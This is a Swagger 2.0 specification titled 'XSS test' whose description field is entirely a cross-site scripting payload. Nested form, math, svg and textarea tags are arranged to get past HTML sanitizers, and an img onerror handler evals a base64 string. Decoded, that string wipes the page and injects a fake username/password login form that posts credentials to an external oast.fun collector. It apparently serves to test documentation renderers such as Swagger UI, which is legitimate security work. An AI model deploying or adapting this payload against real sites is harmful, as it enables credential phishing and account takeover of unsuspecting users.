swagger: '2.0'
info:
  title: XSS test
  description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x id='ZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9Jyc7IAp2YXIgYT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdmb3JtJyk7CmEuYWN0aW9uPSJodHRwOi8veGViYnFndnNxYnJsYnhxcHZnaHdhMnhxMGhsY2d0OTlkLm9hc3QuZnVuL2NyZWRzLnBocCI7CmEubWV0aG9kPSdQT1NUJzsKYS5pbm5lckhUTUw9JzxjZW50ZXI+VXNlcm5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ1c2VyTmFtZSI+PGJyPlBhc3N3b3JkOiA8aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InB3ZCI+PGJyPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJMb2dpbiI+PC9jZW50ZXI+JzsgCmRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7IicK' onerror='eval(atob(this.id))'>"></form>
